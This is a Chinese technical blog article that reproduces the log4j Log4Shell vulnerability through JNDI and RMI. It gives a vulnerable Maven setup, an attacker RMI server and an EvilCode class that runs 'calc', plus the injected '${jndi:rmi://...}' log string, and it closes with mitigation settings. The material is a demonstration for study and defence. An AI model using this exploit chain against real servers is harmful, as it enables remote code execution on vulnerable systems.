Java RMI引起的log4j漏洞問題重現(xiàn)

更新時間：2021年12月14日 11:31:04 作者：張占嶺?lind

java的log4j框架出現(xiàn)了一個大漏洞對服務器案例引起了不小的影響，如果你使用的是spring框架，用的是logback，不受這個問題的影響，下面跟著小編看下Java RMI引起的log4j漏洞問題重現(xiàn)，感興趣的朋友一起看看吧

RMI和JNDIRMI

（Remote Method Invocation）即Java遠程方法調用，一種用于實現(xiàn)遠程過程調用的應用程序編程接口
JNDI (Java Naming and Directory Interface)是一個應用程序設計的API，為開發(fā)人員提供了查找和訪問各種命名和目錄服務的通用、統(tǒng)一的接口
JNDI和RMI的主要關系是RMI注冊的服務可以通過JNDIAPI訪問。在討論到Spring反序列化漏洞之前，先看看如果通過JNDI來調用RMI注冊的服務。

模擬漏洞重現(xiàn)

pom依賴

    <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-logging</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

        <!--log4j2核心包-->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>

黑客端

/**
 * 構建RMI服務來響應惡意代碼
 * <p>
 * Java RMI，即 遠程方法調用（Remote Method Invocation），一種用于實現(xiàn)遠程過程調用(RPC)的Java API， 能直接傳輸序列化后的Java對象和分布式垃圾收集。它的實現(xiàn)依賴于(JVM)，因此它僅支持從一個JVM到另一個JVM的調用。
 */
public class RMIServer {
  @SneakyThrows
  public static void main(String... args) {
    try {
      // 本地主機上的遠程對象注冊表Registry的實例,默認端口1099
      LocateRegistry.createRegistry(1099);
      Registry registry = LocateRegistry.getRegistry();
      System.out.println("Create RMI registry on port 1099");
      //返回的Java對象
      Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
      // 把遠程對象注冊到RMI注冊服務器上，并命名為evil
      registry.bind("evil", referenceWrapper);
    } catch (RemoteException | AlreadyBoundException | NamingException e) {
      e.printStackTrace();
    }
  }

/**
 * 執(zhí)行任意的腳本，目前的腳本會使windows服務器打開計算器.
 */
public class EvilCode {
  static {
    System.out.println("受害服務器將執(zhí)行下面命令行");
    Process p;

    String[] cmd = {"calc"};
    try {
      p = Runtime.getRuntime().exec(cmd);
      InputStream fis = p.getInputStream();
      InputStreamReader isr = new InputStreamReader(fis);
      BufferedReader br = new BufferedReader(isr);
      String line = null;
      while ((line = br.readLine()) != null) {
        System.out.println(line);
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
}

網站端

public class Server {
  private static final Logger logger = LogManager.getLogger();

  public static void main(String[] args) {
    String name = "${java:runtime}";
    logger.info("name:{}", name);
    //模擬填寫數據,輸入構造好的字符串,使受害服務器打印日志時執(zhí)行遠程的代碼 同一臺可以使用127.0.0.1
    String username = "${jndi:rmi://127.0.0.1:1099/evil}";
    //正常打印業(yè)務日志
    logger.error("username:{}", username);

  }
}

【緊急補救措施3選1】

修改 JVM 參數 -Dlog4j2.formatMsgNoLookups=true
修改配置 log4j2.formatMsgNoLookups=True
將系統(tǒng)環(huán)境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置為 true

到此這篇關于java RMI引起的log4j漏洞的文章就介紹到這了,更多相關java RMI 漏洞內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家！

您可能感興趣的文章:

Java注解@Transactional事務類內調用不生效問題及解決辦法
這篇文章主要介紹了Java注解@Transactional事務類內調用不生效問題及解決辦法，文中通過示例代碼介紹的非常詳細，對大家的學習或者工作具有一定的參考學習價值，需要的朋友們下面隨著小編來一起學習學習吧
2020-05-05
Java保留兩位小數的實現(xiàn)方法
這篇文章主要介紹了 Java保留兩位小數的實現(xiàn)方法的相關資料,需要的朋友可以參考下
2017-06-06
springboot基于IDEA環(huán)境熱加載與熱部署教程
這篇文章主要為大家介紹了springboot在IDEA環(huán)境下的熱加載與熱部署教程，有需要的朋友可以借鑒參考下，希望能夠有所幫助，祝大家多多進步
2022-03-03
SpringTask-Timer實現(xiàn)定時任務的詳細代碼
在項目中開發(fā)定時任務應該一種比較常見的需求,今天通過示例代碼給大家講解SpringTask-Timer實現(xiàn)定時任務的相關知識,感興趣的朋友一起看看吧
2024-06-06
java中的Integer的toBinaryString()方法實例
這篇文章主要介紹了java中的Integer的toBinaryString()方法實例，有需要的朋友可以參考一下
2013-12-12
SpringBoot中如何對actuator進行關閉
這篇文章主要介紹了SpringBoot中如何對actuator進行關閉問題，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2023-03-03
Spring boot 集成Dubbox的方法示例
本篇文章主要介紹了Spring boot 集成Dubbox的方法示例，小編覺得挺不錯的，現(xiàn)在分享給大家，也給大家做個參考。一起跟隨小編過來看看吧
2018-05-05
MyBatis框架簡介
本文主要介紹了MyBatis框架的基礎知識。具有很好的參考價值。下面跟著小編一起來看下吧
2017-03-03
RocketMQ4.5.X 實現(xiàn)修改生產者消費者日志保存路徑
這篇文章主要介紹了RocketMQ4.5.X 實現(xiàn)修改生產者消費者日志保存路徑方式，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2021-07-07
java多線程編程制作電子時鐘
本文給大家匯總了幾個使用java多線程編程實現(xiàn)的電子時鐘的代碼，思路非常的巧妙，也都很實用，有需要的小伙伴可以參考下。
2015-11-11